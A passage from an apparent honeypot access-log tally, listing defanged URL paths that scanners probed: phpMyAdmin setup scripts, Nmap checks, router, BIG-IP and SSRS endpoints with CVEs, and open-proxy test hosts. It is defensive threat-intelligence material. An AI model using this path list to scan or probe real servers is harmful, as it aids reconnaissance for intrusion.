| /PMA2018/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /SQL/scripts/setup[.]php | - | - | 1 件 |
| /_PHPMYADMIN/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /admin/db/scripts/setup[.]php | Administrator | - | 1 件 |
| /admin/mysql/scripts/setup[.]php | MySQL | - | 1 件 |
| /admin/pMA/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /admin/phpMyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /admin/scripts/setup[.]php | Administrator | - | 1 件 |
| /admin/setup[.]php | Administrator | - | 1 件 |
| /admin/sql/scripts/setup[.]php | SQL | - | 1 件 |
| /admin/sqladmin/scripts/setup[.]php | SQLAdmin | - | 1 件 |
| /admin/sysadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /admin/web/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator1/admin/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator1/db/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator1/pma/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /administrator1/web/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator/admin/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator/db/scripts/setup[.]php | Administrator | - | 1 件 |
| /administrator/pma/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /administrator/web/scripts/setup[.]php | Administrator | - | 1 件 |
| /blog/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /cpadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /cpadmindb/scripts/setup[.]php | Administrator | - | 1 件 |
| /cpanelmysql/scripts/setup[.]php | MySQL | - | 1 件 |
| /cpanelphpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /db/db-admin/scripts/setup[.]php | Administrator | - | 1 件 |
| /db/dbadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /db/dbweb/scripts/setup[.]php | Database | - | 1 件 |
| /db/myadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /db/phpMyAdmin-3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /db/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /db/phpmyadmin3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /db/webadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /db/webdb/scripts/setup[.]php | Database | - | 1 件 |
| /db/websql/scripts/setup[.]php | SQL | - | 1 件 |
| /mysql-admin/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysql/admin/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysql/db/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysql/mysqlmanager/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysql/pMA/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /mysql/sqlmanager/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysql/web/scripts/setup[.]php | MySQL | - | 1 件 |
| /mysqlmanager/scripts/setup[.]php | MySQL | - | 1 件 |
| /p/m/a/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /php-my-admin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /php-myadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /php/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpLDAPadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /phpMyAdmi/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /hpMyAdmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /phpMyAdmin-2009-1/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2009-3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2009-2/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-3[.]1[.]3[.]1/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]11[.]9[.]5/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]10[.]0[.]0/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]10[.]0/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]11[.]1-all-languages/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]11[.]11[.]3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]11[.]11/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-2[.]5[.]5/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-3[.]0[.]0[.]0-all-languages/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin-3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAds/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmanager/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmy-admin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2011/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2012/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2013/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2014/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2015/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2017/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin2018/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin3/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin4/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin5/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin6/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin7/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phppgadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /phppma/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2006/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2007/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2008/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2009/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2010/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2011/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2012/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2013/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2014/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2015/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2016/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pma2017/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /program/scripts/setup[.]php | PHPMyAdmin | - | 1 件 |
| /shopdb/scripts/setup[.]php | - | - | 1 件 |
| /sql/myadmin/scripts/setup[.]php | - | - | 1 件 |
| /sql/php-myadmin/scripts/setup[.]php | - | - | 1 件 |
| /sql/phpMyAdmin/scripts/setup[.]php | - | - | 1 件 |
| /sql/phpMyAdmin2/scripts/setup[.]php | - | - | 1 件 |
| /sql/phpmanager/scripts/setup[.]php | - | - | 1 件 |
| /sql/phpmy-admin/scripts/setup[.]php | - | - | 1 件 |
| /sql/sql-admin/scripts/setup[.]php | - | - | 1 件 |
| /sql/sql/scripts/setup[.]php | - | - | 1 件 |
| /sql/sqladmin/scripts/setup[.]php | - | - | 1 件 |
| /sql/sqlweb/scripts/setup[.]php | - | - | 1 件 |
| /sql/webadmin/scripts/setup[.]php | - | - | 1 件 |
| /sql/webdb/scripts/setup[.]php | - | - | 1 件 |
| /sql/websql/scripts/setup[.]php | - | - | 1 件 |
| /sqlmanager/scripts/setup[.]php | - | - | 1 件 |
| /sqlweb/scripts/setup[.]php | - | - | 1 件 |
| /web/phpmyadmin/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /web/scripts/setup[.]php | web page | - | 1 件 |
| /webadmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /webdb/scripts/setup[.]php | Database | - | 1 件 |
| /websql/scripts/setup[.]php | SQL | - | 1 件 |
| /xampp/phpmyadmin/scripts/setup[.]php | Unknown | - | 1 件 |
| /~/phpmanager/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /PHPMYADMIN/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /pHpMyAdMiN/scripts/setup[.]php | phpMyAdmin | - | 1 件 |
| /phpmyadmin/scripts/db[.]init[.]php | phpMyAdmin | - | 1 件 |
| /phpMyAdmin/scripts/db[.]init[.]php | phpMyAdmin | - | 1 件 |
| /phpAdmin/scripts/setup[.]php | Administrator | - | 1 件 |
| /tmpfs/auto[.]jpg | - | - | 1 件 |
| /wp-content/plugins/angwp/package[.]json | WordPress | - | 1 件 |
| /manager/text/list | Apache Tomcat Manager | - | 1 件 |
| /stalker_portal/c/version[.]js | - | - | 1 件 |
| /client_area/ | Unknown | Unknown | 1 件 |
| /system_api[.]php | - | - | 1 件 |
| /stalker_portal/c/ | - | - | 1 件 |
| /api[.]php | api | - | 1 件 |
| /login[.]php | Login Page | - | 1 件 |
| /streaming | - | - | 1 件 |
| /streaming/er678pkf[.]php | - | - | 1 件 |
| /cdn-cgi/trace | Cloudflare | - | 1 件 |
| /// | - | - | 1 件 |
| ///wp-json/wp/v2/users/ | - | - | 1 件 |
| /HNAP1/ | D-Link Router | CVE-2017-3193 | 1 件 |
| hxxp://112[.]35[.]88[.]28:8088/index[.]php | - | - | 1 件 |
| /nmaplowercheck1594687755 | Nmap | - | 1 件 |
| /NmapUpperCheck1594687755 | Nmap | - | 1 件 |
| /Nmap/folder/check1594687755 | Nmap | - | 1 件 |
| /HNAP1 | D-Link Router | CVE-2017-3193 | 1 件 |
| /evox/about | Nmap | - | 1 件 |
| /ctrlt/DeviceUpgrade_1 | Huawei Home Device | - | 1 件 |
| /Telerik[.]Web[.]UI[.]WebResource[.]axd | - | - | 1 件 |
| /TP/public/index[.]php | - | - | 1 件 |
| /nmaplowercheck1594884888 | Nmap | - | 1 件 |
| /NmapUpperCheck1594884888 | Nmap | - | 1 件 |
| /solr/ | - | - | 1 件 |
| /ReportServer | SQL Server Reporting Services | CVE-2020-0618 | 1 件 |
| /adv,/cgi-bin/weblogin[.]cgi | Zyxel NAS | CVE-2020-9054 | 1 件 |
| '/xui/common/images/bg_status[.]php' | F5 Networks BIG-IP | CVE-2020-5902 | 1 件 |
| /nice ports,/Trinity[.]txt[.]bak | - | - | 1 件 |
| md5calc[.]com:443 | Unauthorized Relay | - | 1 件 |
| ifconfig[.]me:443 | Unauthorized Relay | - | 1 件 |
| www[.]showmyip[.]com:443 | Unauthorized Relay | - | 1 件 |
| /wordpress | WordPress | - | 1 件 |
| /wordpress/wp-json/wp/v2/users | WordPress | - | 1 件 |
| /wordpress/ | WordPress | - | 1 件 |
| /user/UserLogin | WP Marketplace 2.4.0 | CVE-2014-9013 CVE-2014-9014 | 1 件 |
| chekfast[.]zennolab[.]com:443 | Unauthorized Relay | - | 1 件 |
| hxxps://chek[.]zennolab[.]com/proxy[.]php | Unauthorized Relay | - | 1 件 |
| v4[.]ipv6-test[.]com:443 | Unauthorized Relay | - | 1 件 |
| hxxp://112[.]35[.]63[.]31:8088/index[.]php | - | - | 1 件 |